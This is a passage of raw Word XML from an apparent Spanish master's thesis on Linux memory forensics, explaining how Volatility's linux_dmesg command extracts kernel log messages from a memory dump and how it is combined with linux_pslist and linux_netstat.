5RfxZugiGgSsnKZZ+ihqXHMr+hu&#10;KS2QS88jKz2Z+JhoYpMzWXtvLkbLZS43S+AkhBB3Owme5iidMZ15IVbKShvvSE+NuybMrxJB7vbH&#10;2bEmkrZT7/NZjbsPLm+Q4oUhKo28Dffz8ON/yiP3ryCu5zz73/mMhhsauC+EEOLL5Mvx2E4IIYQQ&#10;4g7rtHbzlz/5ifQ8CSGEEEK4QjfQwZsvvyTBkxBCCCGEK9SBXsrKKyR4EkIIIYRwhwRPQgghhBBu&#10;kOBJCCGEEMINEjwJIYQQQrhBgichhBBCCDdI8CSEEEII4YK69n4c70KW4EkIIYQQwg0SPAkhhBBC&#10;uEGCJyGEEEIIl8H/DygOwOTHIj5mAAAAAElFTkSuQmCCUEsDBBQABgAIAAAAIQB+2BuR3gAAAAcB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9PS8NAEMXvgt9hGcGb3fxBE2I2pRT1VARbQbxNs9MkNLsb&#10;stsk/faOJz3Oe4/3flOuF9OLiUbfOasgXkUgyNZOd7ZR8Hl4fchB+IBWY+8sKbiSh3V1e1Niod1s&#10;P2jah0ZwifUFKmhDGAopfd2SQb9yA1n2Tm40GPgcG6lHnLnc9DKJoidpsLO80OJA25bq8/5iFLzN&#10;OG/S+GXanU/b6/fh8f1rF5NS93fL5hlEoCX8heEXn9GhYqaju1jtRa+AHwkKkjwGwW6ephmIIwtZ&#10;loCsSvmfv/o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eS6h&#10;75QDAAAkCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA&#10;n8FG3WHSAABh0gAAFAAAAAAAAAAAAAAAAAD6BQAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAU&#10;AAYACAAAACEAftgbkd4AAAAHAQAADwAAAAAAAAAAAAAAAACN2AAAZHJzL2Rvd25yZXYueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAAmNkAAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAi9oAAAAA&#10;">
                <v:shape id="Imagen 80" o:spid="_x0000_s1112" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:29502;height:15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OZygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9RS8Mw&#10;FIXfBf9DuANfypY2TCl12RBBcCKI3djztblry5qbksSt+uuNIPh4OOd8h7PaTHYQZ/Khd6yhWOQg&#10;iBtnem417HdP8xJEiMgGB8ek4YsCbNbXVyusjLvwO53r2IoE4VChhi7GsZIyNB1ZDAs3Eifv6LzF&#10;mKRvpfF4SXA7SJXnd9Jiz2mhw5EeO2pO9afVkKnvF789vB3LD1dnRbOlVywzrW9m08M9iEhT/A//&#10;tZ+NBlWqfHlbLBX8Xkp3QK5/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJUZ85nKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:imagedata r:id="rId158" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1113" type="#_x0000_t202" style="position:absolute;left:30734;top:8763;width:2220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BPRzQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPsPkSftgli6MZVSlk3TBBJwmSi7cIsarylrnCpJt/Lv8QGJo+3n99633o6uExcMsfWkYDHP&#10;QCDV3rTUKDh+vtwVIGLSZHTnCRX8YITtZnKz1qXxV/rAS5UawSYUS63AptSXUsbaotNx7nskvp18&#10;cDrxGBppgr6yuevkMsty6XRLnGB1j3uL9bkanILD6utgb4fT8/tudR/ejsM+/24qpWbTcfcEIuGY&#10;/sV/36+G6z8+5ItlURRMwUy8ALn5BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJdkE9HN&#10;AAAA4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="42388D79" w14:textId="02EDE3BB" w:rsidR="006416DF" w:rsidRPr="009F2F82" w:rsidRDefault="006416DF" w:rsidP="006416DF">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>29</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="78" w:name="_Toc155782596"/>
                        <w:r>
                          <w:t xml:space="preserve">Comando </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00357E2C">
                          <w:t>linux_dmesg</w:t>
                        </w:r>
                        <w:r>
                          <w:t>.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="78"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155739960 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XVI.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>] [</w:t>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155739966 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XVII.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C668309" w14:textId="4117D060" w:rsidR="00EE7DF8" w:rsidRDefault="00487731" w:rsidP="00487731">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155654417 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XII. Comando linux_demsg</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354DA0C1" w14:textId="0E6334C3" w:rsidR="00487731" w:rsidRDefault="00487731" w:rsidP="00487731">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155654459 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XIII. Resumen del comando linux_demsg</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B651A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3AC7B" w14:textId="1B0F982A" w:rsidR="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se procede a recabar una información </w:t>
      </w:r>
      <w:r w:rsidR="007909C5" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> completa de la memoria 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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, hablamos del comando </w:t>
      </w:r>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_dmesg</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, este comando </w:t>
      </w:r>
      <w:r w:rsidR="00614982">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nos </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>puede ser de gran utilidad por las siguientes razones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5275D5" w14:textId="16B3531B" w:rsidR="00AA7FAD" w:rsidRPr="007909C5" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extracción de Mensajes del Kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BEF1AC" w14:textId="617BC355" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="007909C5" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>inux_dmesg</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza para extraer los mensajes del buffer de registro del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, conocido como </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>dmesg</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, de un volcado de memoria de Linux. Este buffer contiene mensajes de diagnóstico y de depuración que son emitidos por el kernel de Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575A2FC" w14:textId="1EA50CD8" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Los mensajes extraídos pueden proporcionar información valiosa durante un análisis forense. Pueden incluir detalles sobre el hardware del sistema, errores del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, información de carga de módulos del kernel y otros mensajes de diagnóstico que son útiles para entender el estado y las acciones del sistema en el momento del volcado de la memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B2526" w14:textId="461EB340" w:rsidR="00AA7FAD" w:rsidRPr="007909C5" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Investigación de Incidentes de Seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B7317" w14:textId="3AE2D57D" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_dmesg</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede ayudar a identificar actividades sospechosas o maliciosas, como la carga de módulos del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> no autorizados o errores relacionados con intentos de explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A854247" w14:textId="2161A239" w:rsidR="00AA7FAD" w:rsidRPr="007909C5" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Uso en Conjunto con Otros Comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B525BB0" w14:textId="658171A1" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A menudo, </w:t>
      </w:r>
      <w:r w:rsidRPr="00614982">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_dmesg</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza en combinación con otros comandos de Volatility diseñados para el análisis de sistemas Linux, como </w:t>
      </w:r>
      <w:r w:rsidRPr="00614982">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_pslist</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para listar procesos, </w:t>
      </w:r>
      <w:r w:rsidRPr="00614982">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver conexiones de red. En los próximos apartados del TFM, realizaremos estos comandos para obtener una </w:t>
      </w:r>
      <w:r w:rsidR="00614982" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visión</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> global </w:t>
      </w:r>
      <w:r w:rsidR="00614982" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo ocurrido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8EB80E" w14:textId="78EFBB1C" w:rsidR="00AA7FAD" w:rsidRPr="00487731" w:rsidRDefault="00AA7FAD" w:rsidP="00487731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por </w:t>
      </w:r>
      <w:r w:rsidR="00614982" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tanto,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en este caso, como muy presumiblemente va a resultar un comando bastante extenso, ejecutaremos el comando el cual la salida se extraerá a un documento de texto. El comando</w:t>
      </w:r>
      <w:r w:rsidR="00614982">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
